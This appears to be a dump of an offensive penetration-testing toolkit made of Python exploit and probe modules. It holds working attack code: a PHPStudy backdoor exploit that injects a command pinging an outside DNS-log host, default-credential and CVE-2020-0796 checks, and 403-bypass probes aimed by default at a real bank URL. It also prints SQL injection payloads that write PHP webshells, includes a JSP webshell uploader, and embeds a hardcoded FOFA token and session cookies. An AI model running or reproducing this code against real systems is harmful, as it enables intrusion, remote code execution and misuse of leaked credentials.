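    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(MetaBase):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)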
80 |
--------------------------------------------------------------------------------
/EXP/PHPStudy.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | from ClassCongregation import Dnslog#通过Dnslog判断
4 | import base64
5 | import time
class PHPStudy():
    """PHPStudy checks; one method per finding.

    Unlike the other EXP modules there is no verify/attack split: each method
    always sends its probe, and ``self.vuln`` is not consulted. Reporting goes
    through the project's ``Output``/``ExpRequest`` helpers and ``Dnslog``
    (none in view). ``self.status`` becomes ``'success'`` on a positive result.
    The ``appName``/``desc`` locals are descriptive only and unused.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        ``win_cmd``/``linux_cmd`` fall back to an echo marker only when ``cmd``
        is absent from ``env``, not when it is passed as None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def PHPStudyBackdoor(self):
        """Out-of-band check for the PHPStudy backdoor via the ``accept-charset`` header.

        The header carries a base64 command that pings a Dnslog host; after a
        fixed 2 s wait, success means the DNS callback was observed. Exceptions
        are reported, not raised.
        """
        DL = Dnslog() # obtain a Dnslog callback host
        appName = 'PHPStudy'
        pocname = 'PHPStudyBackdoor'
        path = '/index.php'
        method = 'get'
        desc = 'PHPStudyBackdoor脚本漏洞'
        payload = ('''system("ping {}");''').format(DL.dns_host())
        # b64encode returns bytes: the header value is bytes, and the success
        # message below therefore shows a b'...' repr rather than plain text.
        payload = base64.b64encode(payload.encode('utf-8'))
        Headers = {
            'Sec-Fetch-Mode' : 'navigate',
            'Sec-Fetch-User' : '?1',
            'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',
            'Sec-Fetch-Site' : 'none',
            'accept-charset' : payload
        }
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)

        try:
            exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False)
            # Give the callback time to arrive before polling Dnslog.
            time.sleep(2)
            if DL.result():
                info = "存在phpStudyBackdoor脚本漏洞, Payload:{}".format(payload)
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))

    def PHPStudyphpmyadmin(self):
        """Default-credential check for the bundled phpMyAdmin (root/root).

        Success requires both the login POST response and a follow-up GET of
        the same path to contain the post-login markers. Exceptions are
        reported, not raised.
        """
        appName = 'PHPStudy'
        pocname = 'PHPStudyphpmyadmin'
        path = "/phpmyadmin/index.php"
        method = 'post'
        desc = 'phpstudy_phpmyadmin默认密码漏洞'
        payload = {
            "pma_username": "root",
            "pma_password": "root",
            "server": "1",
            "target": "index.php"
        }
        Headers = {
            'Accept' : '*/*',
            'Content-Type' : 'application/x-www-form-urlencoded'
        }
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)

        try:
            resp = exprequest.post(self.url+path, data=payload, headers=Headers, timeout=self.timeout, verify=False).text
            # presumably ExpRequest keeps a session so this GET sees the logged-in page — confirm in util.ExpRequest.
            resp2 = exprequest.get(self.url+path, headers=Headers, timeout=self.timeout, verify=False).text

            if resp2.lower().find('navigation.php')!=-1 and resp.lower().find('frame_navigation')!=-1:
                info = "存在phpstudy_phpmyadmin默认密码漏洞"
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))

    def PHPStudyProbe(self):
        """Information-disclosure check for an exposed PHP probe page at ``/l.php``.

        Success requires both ``php_version`` and ``phpstudy`` (case-insensitive)
        in the response body. Exceptions are reported, not raised.
        """
        appName = 'PHPStudy'
        pocname = 'PHPStudyProbe'
        path = '/l.php'
        method = 'get'
        desc = 'PHPStudy探针泄露漏洞'
        # output helper
        output = Output(pocname)
        # request helper
        exprequest = ExpRequest(pocname, output)

        try:
            resp = exprequest.get(self.url+path, timeout=self.timeout, verify=False).text

            if resp.lower().find('php_version')!=-1 and resp.lower().find('phpstudy')!=-1:
                info = "存在phpstudy探针泄露漏洞"
                output.echo_success(method, info)
                self.status = 'success'
            else:
                output.fail()
        except Exception as error:
            output.error_output(str(error))
112 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one check, or every check, of ``PHPStudy``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be check methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = PHPStudy(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(PHPStudy):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
129 |
130 |
131 |
--------------------------------------------------------------------------------
/EXP/WindowsSMBv3.py:
--------------------------------------------------------------------------------
1 | from util.ExpRequest import ExpRequest,Output
2 | from operator import methodcaller
3 | import socket
4 | import struct
class WindowsSMBv3():
    """SMBv3 negotiate-based check for CVE-2020-0796; one method.

    Shared settings come from ``env``; reporting goes through the project's
    ``Output`` helper (not in view). Unlike the HTTP modules this one talks
    raw TCP/445 and ``self.vuln`` is not consulted.
    """
    def __init__(self, **env):
        """
        Initialise the shared parameters from ``env``.

        ``timeout``, ``retry_time`` and ``retry_interval`` are mandatory
        (``int(None)`` raises TypeError); the other keys default to None.
        ``win_cmd``/``linux_cmd`` fall back to an echo marker only when ``cmd``
        is absent from ``env``, not when it is passed as None.
        """
        self.url = env.get('url')
        self.cookie = env.get('cookie')
        self.cmd = env.get('cmd')
        self.pocname = env.get('pocname')
        self.vuln = env.get('vuln')
        self.timeout = int(env.get('timeout'))
        self.retry_time = int(env.get('retry_time'))
        self.retry_interval = int(env.get('retry_interval'))
        self.win_cmd = 'cmd /c '+ env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.linux_cmd = env.get('cmd', 'echo VuLnEcHoPoCSuCCeSS')
        self.status = env.get('status')

    def CVE_2020_0796(self):
        """Send one fixed SMB2 negotiate request to ``self.url``:445 and inspect two fields of the reply.

        ``self.url`` must be a bare host name or IP (``gethostbyname`` rejects a
        URL with a scheme; the failure is then reported via ``Output``). Sets
        ``self.status = 'success'`` on a match. Exceptions are reported, not
        raised. ``desc`` and the first ``info`` value are unused.
        """
        appName = 'Windows'
        pocname = 'CVE_2020_0796'
        method = 'socket'
        payload = b'\x00\x00\x00\xc0\xfeSMB@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
        desc = 'Windows : CVE_2020_0796'
        info = 'WindowsSMBv3协议漏洞'
        # output helper
        output = Output(pocname)
        # request helper (unused by this socket-based check)
        exprequest = ExpRequest(pocname, output)

        try:
            # NOTE(review): the socket is never closed (no with/finally), and the
            # 3 s timeout is hard-coded rather than taken from self.timeout.
            sock = socket.socket(socket.AF_INET)
            sock.settimeout(3)
            ip = socket.gethostbyname(self.url)
            sock.connect((ip, 445))
            sock.send(payload)
            # 4-byte big-endian length prefix, then a single recv() for the body.
            # A short read (fewer than 4 bytes -> struct.error; fewer than nb ->
            # short slices below) ends in the except or in fail() respectively.
            nb, = struct.unpack(">I", sock.recv(4))
            res = sock.recv(nb)
            # Byte offsets 68..71 of the reply are compared with fixed values;
            # presumably the negotiated dialect (0x0311) and a compression-related
            # field per MS-SMB2 — confirm against the spec before relying on it.
            if (not res[68:70] == b"\x11\x03") or (not res[70:72] == b"\x02\x00"):
                output.fail()
            else:
                info = "{}存在WindowsSMBv3协议漏洞(CVE-2020-0796), IP值:{}".format(self.url,ip)
                output.echo_success(method, info)
                self.status = 'success'
        except Exception as error:
            output.error_output(str(error))
50 |
def check(**kwargs):
    """Entry point used by EXP/ALL.py: run one check, or every check, of ``WindowsSMBv3``.

    ``kwargs`` goes to the constructor unchanged and must contain ``pocname``
    (KeyError otherwise). A specific ``pocname`` calls that method and returns
    the instance's ``status`` as-is. ``'ALL'`` calls every non-dunder name on
    the class in ``dir()`` order (assumed to be check methods) and returns a
    ``name -> status`` line per call between two separator lines, resetting
    ``status`` to ``'fail'`` after each call.
    """
    target = WindowsSMBv3(**kwargs)
    wanted = kwargs['pocname']
    if wanted != 'ALL':
        getattr(target, wanted)()
        return target.status
    separator = '----------------------------'
    report = [separator]
    for name in dir(WindowsSMBv3):
        if name.startswith("__"):
            continue
        methodcaller(name)(target)
        report.append(name + ' -> ' + target.status)
        target.status = 'fail'
    report.append(separator)
    return '\n'.join(report)
67 |
68 |
--------------------------------------------------------------------------------
/EXP/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ch4O3/CodeTest/3ef65f42db19e72b84107409f5d344286dc7a90d/EXP/__init__.py
--------------------------------------------------------------------------------
/POC/ByPass403.py:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 | import requests
3 | import urllib3
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 |
# Candidate values tried by the bypass probes. Only Change_Host (Host header)
# and Add_Original (X-Original-URL / X-Rewrite-URL) are in view here;
# Trust_Referer, Trust_Proxy and Trust_Extend are presumably consumed by
# probes further down the file — confirm.
Trust_Domain = ['www.baidu.com','www.google.com','home.firefoxchina.cn','www.zhihu.com','www.csdn.net','www.weibo.com']
Trust_Original = ['/admin','/console']
Trust_Referer = ['http://www.baidu.com']
Trust_Proxy = ['127.0.0.1', '114.114.114.114']
Trust_Extend = ['/', '//', '/*', '/*/', '/.', '/./', '/./.', '?', '??', '???', '..;/', '/..;/', '%20/', '%09/']

# Base headers merged into every probe request.
# NOTE(review): the Cookie value carries fixed session identifiers (JSESSIONID,
# jeesite.session.id, ...) that are sent verbatim to every host probed; treat
# them as disclosed and rotate them if they were ever live.
org_headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US, en;q=0.5',
    'Accept-Encoding': 'gzip, deflate',
    'Connection': 'close',
    'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1',
}

# Local HTTP proxy; not referenced by any function in view.
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "http://127.0.0.1:8080",
}
# Default per-request timeout in seconds (each probe takes it as a parameter).
TIMEOUT = 2
26 | def Change_Host(url, TIMEOUT=TIMEOUT):
27 | for i in Trust_Domain:
28 | headers = {
29 | 'Host': '%s'%i,
30 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
31 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
32 | 'Accept-Language': 'en-US, en;q=0.5',
33 | 'Accept-Encoding': 'gzip, deflate',
34 | 'Connection': 'close',
35 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1'
36 | }
37 | try:
38 | resp_code = requests.get(url=url, headers=headers,
39 | timeout=TIMEOUT,
40 | allow_redirects=False,
41 | verify = False).status_code
42 | if resp_code == 200:
43 | color('[+] Host: %s %s'%(i, resp_code), 'green')
44 | elif resp_code != 403:
45 | color('[?] Host: %s %s'%(i, resp_code), 'blue')
46 | else:
47 | color('[-] Host: %s %s'%(i, resp_code), 'red')
48 | except Exception as error:
49 | color('[-] Host: %s done!'%i, 'red')
50 | continue
51 |
52 | def Add_Original(url, TIMEOUT=TIMEOUT):
53 | for i in Trust_Original:
54 | Add_headers = {
55 | 'X-Original-URL': i,
56 | 'X-Rewrite-URL': i
57 | }
58 | headers = {**org_headers, **Add_headers}
59 | try:
60 | resp_code = requests.get(url=url, headers=headers,
61 | timeout=TIMEOUT,
62 | allow_redirects=False,
63 | #proxies=proxies,
64 | verify = False).status_code
65 | if resp_code == 200:
66 | color('[+] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'green')
67 | elif resp_code != 403:
68 | color('[?] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'blue')
69 | else:
70 | color('[-] X-Original-URL/X-Rewrite-URL: %s %s'%(i, resp_code), 'red')
71 | except Exception as error:
72 | color('[-] X-Original-URL/X-Rewrite-URL: %s done!'%(i), 'red')
73 | continue
74 |
75 | def Add_Referer(url, TIMEOUT=TIMEOUT):
76 | for i in Trust_Referer:
77 | Add_headers = {
78 | 'Referer': i
79 | }
80 | headers = {**org_headers, **Add_headers}
81 | try:
82 | resp_code = requests.get(url=url, headers=headers,
83 | timeout=TIMEOUT,
84 | allow_redirects=False,
85 | verify = False).status_code
86 | if resp_code == 200:
87 | color('[+] Referer: %s %s'%(i, resp_code), 'green')
88 | elif resp_code != 403:
89 | color('[?] Referer: %s %s'%(i, resp_code), 'blue')
90 | else:
91 | color('[-] Referer: %s %s'%(i, resp_code), 'red')
92 | except Exception as error:
93 | color('[-] Referer: %s done!'%(i), 'red')
94 | continue
95 |
96 | def Add_Proxy(url, TIMEOUT=TIMEOUT):
97 | for Trust_IP in Trust_Proxy:
98 | Add_headers = {
99 | 'X-Originating-IP': Trust_IP,
100 | 'X-Remote-IP': Trust_IP,
101 | 'X-Client-IP': Trust_IP,
102 | 'X-Forwarded-For': Trust_IP,
103 | 'X-Forwared-Host': Trust_IP,
104 | 'X-Host': Trust_IP,
105 | 'X-Custom-IP-Authorization': Trust_IP
106 | }
107 | headers = {**org_headers, **Add_headers}
108 | try:
109 | resp_code = requests.get(url=url, headers=headers,
110 | timeout=TIMEOUT,
111 | allow_redirects=False,
112 | verify = False).status_code
113 | if resp_code == 200:
114 | color('[+] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'green')
115 | elif resp_code != 403:
116 | color('[?] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'blue')
117 | else:
118 | color('[-] X-Forwarded-For: %s %s'%(Trust_IP, resp_code), 'red')
119 | except Exception as error:
120 | color('[-] X-Forwarded-For: %s done!'%(Trust_IP), 'red')
121 | continue
122 |
123 | def Add_Extend(url, TIMEOUT=TIMEOUT):
124 | for i in Trust_Extend:
125 | url_new = url + i
126 | try:
127 | resp_code = requests.get(url=url_new, headers=org_headers,
128 | timeout=TIMEOUT,
129 | allow_redirects=False,
130 | verify = False).status_code
131 | if resp_code == 200:
132 | color('[+] url: %s %s'%(url_new, resp_code), 'green')
133 | elif resp_code != 403:
134 | color('[?] url: %s %s'%(url_new, resp_code), 'blue')
135 | else:
136 | color('[-] url: %s %s'%(url_new, resp_code), 'red')
137 | except Exception as error:
138 | color('[-] url: %s done!'%(url_new), 'red')
139 | continue
140 | finally:
141 | url_new = None
142 |
143 | def check(**kwargs):
144 | url = kwargs['url']
145 | #url = 'https://moa.cmbc.com.cn/moastatic'
146 | try:
147 | resp_code = requests.get(url=url, headers=org_headers,
148 | timeout=TIMEOUT,
149 | #allow_redirects=False,
150 | verify = False).status_code
151 | if resp_code != 403:
152 | color('[-] Page has not return 403!', 'red')
153 | return
154 | except Exception as error:
155 | color('[-] An error occurred %s'%type(error), 'red')
156 | return
157 | #url = url.strip('/')
158 | color('[*] Scanning target domain %s'%url, 'green')
159 | Change_Host(url)
160 | Add_Original(url)
161 | Add_Referer(url)
162 | Add_Proxy(url)
163 | Add_Extend(url)
164 |
165 | if __name__ == "__main__":
166 | check(**{'url':'https://moa.cmbc.com.cn/moastatic/'})
167 |
168 |
169 |
170 |
171 |
172 |
173 |
174 |
175 |
176 |
177 |
178 |
--------------------------------------------------------------------------------
/POC/ByWAF_Mysql.py:
--------------------------------------------------------------------------------
1 | def tamper1(payload):
2 | if payload:
3 | payload=payload.replace(" ","/*!90000aaa*/")
4 | payload=payload.replace("+","/*!90000aaa*/")
5 | payload=payload.replace("and","%26%26")
6 | payload=payload.replace("=","/*!90000aaa*/=/*!90000aaa*/")
7 | payload=payload.replace("union","union/*!90000aaa*/")
8 | payload=payload.replace("#","/*!90000aaa*/%23")
9 | payload=payload.replace("user()","user/*!()*/")
10 | payload=payload.replace("database()","database/*!()*/")
11 | payload=payload.replace("--","/*!90000aaa*/--")
12 | payload=payload.replace("select","/*!90000aaa*/select")
13 | payload=payload.replace("from","/*!90000aaa*//*!90000aaa*/from")
14 | return payload
15 |
16 | def tamper2(payload):
17 | if payload:
18 | payload=payload.replace(" ","%23a%0a")
19 | payload=payload.replace("+","%23a%0a")
20 | payload=payload.replace("order","order%23a%0a")
21 | payload=payload.replace("--","/*!90000aaa*/--")
22 | payload=payload.replace("#","/*!90000aaa*/%23")
23 | payload=payload.replace("and","%26%26")
24 | payload=payload.replace("union","union%23a%0a")
25 | payload=payload.replace("user()","user/*!()*/")
26 | payload=payload.replace("version()","version/*!()*/")
27 | payload=payload.replace("database()","database/*!()*/")
28 | payload=payload.replace("group","group%23a%0a")
29 | payload=payload.replace("select","select%23a%0a")
30 | payload=payload.replace("from","from%23a%0a")
31 | return payload
32 |
33 | print('Mysql混淆,目标处输入语句!')
34 | print('''常用语句:
35 | '+like+substr(1/(case+when+substr(database(),6,1)='N'+then+1+else+0+end),1,1)='a
36 | 1'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e))
37 | 1'and substr((select database()),1,1)='a
38 | 1'and (select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+
39 | 1'union select null,null,0x3c3f70687020406576616c28245f504f53545b76616c75655d293b3f3e into outfile '/var/www/html/1.php'--+
40 | 1' union select 1,2,'<%3fphp+%40eval(%24_POST[shell])%3b%3f>' into outfile '路径'--+
41 | 1' into outfile '路径' fields terminated by '<%3fphp+%40eval(%24_POST[shell])%3b%3f>'--+''')
42 | def check(**kwargs):
43 | payload = kwargs['url']
44 | payload1 = tamper1(payload)
45 | payload2 = tamper2(payload)
46 |
47 | print('语句一: %s'%payload1)
48 | print('语句二: %s'%payload2)
49 |
50 |
51 |
52 |
53 |
54 |
--------------------------------------------------------------------------------
/POC/Editor_vul.py:
--------------------------------------------------------------------------------
1 | from ClassCongregation import color
2 | import requests
3 | import urllib3
4 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
5 |
6 | ueditor_path = ['/ueditor.config.js','/net/controller.ashx?action=catchimage','/jsp/controller.jsp?action=catchimage&source[]=http://127.0.0.1:80/0f3927bc-5f26-11e8-9c2d-fa7ae01bbebc.png']
7 | kindeditor_path = ['/kindeditor-all.min.js','/asp/upload_json.asp?dir=file','/asp.net/upload_json.ashx?dir=file','/jsp/upload_json.jsp?dir=file','/php/upload_json.php?dir=file']
8 | ckfinder_path = ['ckfinder.html','/core/connector/java/connector.java?command=FileUpload&type=files¤tFolder=/&langCode=zh-cn&hash=&response_type=txt']
9 | fckeditor_path = ['/editor/dialog/fck_about.html','/_whatsnew.html','/editor/filemanager/browser/default/connectors/test.html','/editor/filemanager/upload/test.html','/editor/filemanager/connectors/test.html','/editor/filemanager/connectors/uploadtest.html','/_samples/default.html','/_samples/asp/sample01.asp','/_samples/asp/sample02.asp','/_samples/asp/sample03.asp','/_samples/asp/sample04.asp','/editor/.htm','/editor/fckdialog.html','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/php/connector.php?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/connectors/jsp/connector.jsp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/php/connector.php','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/aspx/connector.aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://www.site.com//editor/filemanager/connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/jsp/connector.jsp','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/aspx/connector.Aspx','/editor/filemanager/browser/default/browser.html?Type=Image&Connector=connectors/php/connector.php','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/she
ll.asp&NewFolderName=z.asp','/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/shell.asp&NewFolderName=z&uuid=1244789975684','/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=CreateFolder&CurrentFolder=/&Type=Image&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../../&NewFolderName=shell.asp','/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=e:/']
10 |
11 | org_headers = {
12 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)',
13 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
14 | 'Accept-Language': 'en-US, en;q=0.5',
15 | 'Accept-Encoding': 'gzip, deflate',
16 | 'Connection': 'close',
17 | 'Cookie': 'currentMenuCode=1370236658088816640; JSESSIONID=06F81F3063191B2508149934FA5115A2; jeesite.session.id=ca4b0bb8c18f4d72b9a4a36035cad00f; pageNo=1',
18 | }
19 |
20 | proxies = {
21 | "http": "http://127.0.0.1:8080",
22 | "https": "http://127.0.0.1:8080",
23 | }
24 | TIMEOUT = 2
25 | def Editor_check(url, editor_path, TIMEOUT=TIMEOUT):
26 | for i in editor_path:
27 | try:
28 | resp = requests.get(url=url + i, headers=org_headers,
29 | timeout=TIMEOUT,
30 | allow_redirects=False,
31 | verify = False)
32 | if resp.status_code == 200 and 'DOCTYPE' not in resp.text:
33 | color('[+] Host: %s %s'%(url + i, resp.status_code), 'green')
34 | print(resp.text[:50])
35 | else:
36 | color('[-] Host: %s %s'%(url + i, resp.status_code), 'red')
37 | except Exception as error:
38 | color('[-] Host: %s done!'%(url + i), 'red')
39 | continue
40 |
41 | def check(**kwargs):
42 | url = kwargs['url'].strip('/')
43 | #url = 'https://moa.cmbc.com.cn/moastatic'
44 | #url = url.strip('/')
45 | color('[*] Scanning target domain %s'%url, 'green')
46 | Editor_check(url,ueditor_path)
47 | Editor_check(url,kindeditor_path)
48 | Editor_check(url,ckfinder_path)
49 | Editor_check(url,fckeditor_path)
50 |
51 | if __name__ == "__main__":
52 | check(**{'url':'***'})
53 |
54 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
--------------------------------------------------------------------------------
/POC/FHAdmin.py:
--------------------------------------------------------------------------------
1 | from urllib3 import encode_multipart_formdata
2 | import requests,os,random
3 |
4 | shell_name = 'Caidao_cmd.jsp'
5 |
6 | def post_files(url,header,filename):
7 | data = {}
8 | data['imgFile']= (random_name(6,'.jsp'),open(scriptPath+'\\execScripts\\'+filename,'rb').read())
9 | encode_data = encode_multipart_formdata(data)
10 | data = encode_data[0]
11 | header['Content-Type'] = encode_data[1]
12 | r = requests.post(url, headers=header, data=data, verify=False)
13 | return r.text
14 |
15 | def random_name(index,suffix=''):
16 | h = "abcdefghijklmnopqrstuvwxyz0123456789_"
17 | salt_cookie = ""
18 | for i in range(index):
19 | salt_cookie += random.choice(h)
20 | return salt_cookie+suffix
21 |
22 | scriptPath = os.getcwd()
23 | def check(**kwargs):
24 | shell_path = post_files(kwargs['url']+"/;/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/",{"cookie":"test"},shell_name)
25 | if requests.get(url=kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip(),verify=False,timeout=5).status_code !=404:
26 | print('[*]上传的shell路径: '+kwargs['url']+'/;/plugins/uploadify/'+shell_path.strip())
27 | else:
28 | print('[-]上传失败: '+shell_path)
29 | if __name__=="__main__":
30 | pass
--------------------------------------------------------------------------------
/POC/FOFA.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.packages import urllib3
3 | urllib3.disable_warnings()
4 | import base64
5 | from lxml import etree
6 |
7 | token = 'eyJhbGciOiJIUzUxMiIsImtpZCI6Ik5XWTVZakF4TVRkalltSTJNRFZsWXpRM05EWXdaakF3TURVMlkyWTNZemd3TUdRd1pUTmpZUT09IiwidHlwIjoiSldUIn0.eyJpZCI6MzU5NjYsIm1pZCI6MTAwMDI2MDc2LCJ1c2VybmFtZSI6InhreDUxOCIsImV4cCI6MTY0NjMzODk5NywiaXNzIjoicmVmcmVzaCJ9.Aqfrl1A0C-WE_T5ZER2eaylK0SdJfWULS8bbnvqWSjlyFzNubPJjbPCqU9nJdKZwTPPUUXp6WBVw33R_tCVAbg'
8 |
9 | fofa_token = token
10 | refresh_token = token
11 |
12 | headers = {
13 | 'User-Agent': 'Mozilla/5.0 (Linux; Android 7.1.2; PCRT00 Build/N2G48H; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.158 Safari/537.36 fanwe_app_sdk sdk_type/android sdk_version_name/4.0.1 sdk_version/2020042901 screen_width/720 screen_height/1280',
14 | }
15 | print('''[*]请登录后使用, fofa查询语法:
16 | +--------------------------+---------------------------------------------+
17 | | 例句 | 用途说明 |
18 | +--------------------------+---------------------------------------------+
19 | | title="beijing" | 从标题中搜索“北京”
20 | | header="elastic" | 从http头中搜索“elastic”
21 | | body="phpcms" | 从html正文中搜索“网络空间测绘”
22 | | domain="qq.com" | 搜索根域名带有qq.com的网站
23 | | icp="ICP-030173号" | 查找备案号为“京ICP证030173号”的网站
24 | | host=".gov.cn" | 从url中搜索”.gov.cn”
25 | | port="6379" | 查找对应“6379”端口的资产
26 | | ip="1.1.1.1" | 从ip中搜索包含“1.1.1.1”的网站
27 | | ip="220.181.111.1/24" | 查询IP为“220.181.111.1”的C网段资产
28 | | protocol="quic" | 查询quic协议资产
29 | | country="CN" | 搜索指定国家(编码)的资产
30 | | app="Microsoft-Exchange" | 搜索Microsoft-Exchange设备
31 | | cert="baidu" | 搜索证书(https或者imaps等)中带有baidu的资产
32 | | status_code="402" | 查询服务器状态为“402”的资产
33 | +--------------------------+---------------------------------------------+
34 | ''')
35 | #获取爬取的页面数量
36 | def pag_num_fun(word):
37 | print("[*]开始获取查询的页面数量...")
38 | #查询词进行baase64编码
39 | s = (base64.b64encode(word.encode('utf-8'))).decode('utf-8')
40 | #查询的url
41 | url = f"https://fofa.info/result?qbase64={s}&page=1&page_size=10"
42 | print("[*]查询地址为:",url)
43 | #获取页面源码
44 | text = requests.get(url=url,headers=headers,verify=False,timeout=20,cookies={'fofa_token':fofa_token,'refresh_token':refresh_token}).text
45 | #获取爬取目标的页面数量
46 | tree = etree.HTML(text)
47 | try:
48 | #pag_num:获取到的页面总数量
49 | pag_num = tree.xpath('//div[@id="__layout"]//div[@class="pagFooter"]/div[@class="el-pagination"]/ul[@class="el-pager"]/li/text()')[-1]
50 | except Exception as error:
51 | print('[-]查询目标无结果,请确认查询语法.详细错误为:%s'%type(error))
52 | #return
53 | #raise Exception("")
54 | print('[*]FOFA爬取页面数量为: '+ pag_num)
55 | return pag_num
56 |
57 | #定义爬取页面ip的函数
